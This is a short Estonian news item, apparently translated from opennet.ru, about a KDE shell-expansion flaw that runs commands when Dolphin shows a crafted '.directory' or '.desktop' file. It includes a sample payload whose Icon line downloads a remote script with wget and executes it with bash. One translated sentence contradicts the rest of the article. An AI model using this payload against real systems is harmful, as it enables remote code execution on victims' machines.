KDE-s , misle, et ründaja suudab täita juhuslikke käske, kui kasutaja vaatab katalooge või arhiive, mis sisaldavad spetsiaalselt vormindatud „.desktop“ ja „.directory“ faile. Rünnakuks piisab, kui kasutaja lihtsalt vaatab failide nimekirja failihalduris Dolphin, laadib alla pahatahtliku desktop-faili või lohistab hiirega otsetee töölauale või dokumenti. Probleem ilmneb aktuaalses väljaandes ja vanemates versioonides, kuni KDE 4-ni. Haavatavust ei ole (CVE-d ei ole sellele määratud).
Probleemi põhjustab KDesktopFile klassi vale rakendamine, mis töötleb muutuja „Icon“ eksitavalt ja edastab väärtuse funktsioonile KConfigPrivate::expandString(), mis viib shell-spetsiaal märkide avamise protsessini, sealhulgas töötleb stringe „$(..)“ kui käsu täitmiseks. Vastupidiselt XDG spetsifikatsiooni nõuetele teostatakse shell-ehituste avamine seadete tüübi eristamiseta, st mitte ainult käivitatava rakenduse käsurea määramisel, vaid ka vaikeikoonide määramisel.
Näiteks, rünnaku jaoks saata kasutajale zip-arhiiv, mis sisaldab katalooge failiga «.directory», nagu:
[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Kui proovitakse arhvi sisu vaadata failihalduris Dolphin, laaditakse ja käivitatakse skript https://example.com/FILENAME.sh.

Allikas: opennet.ru
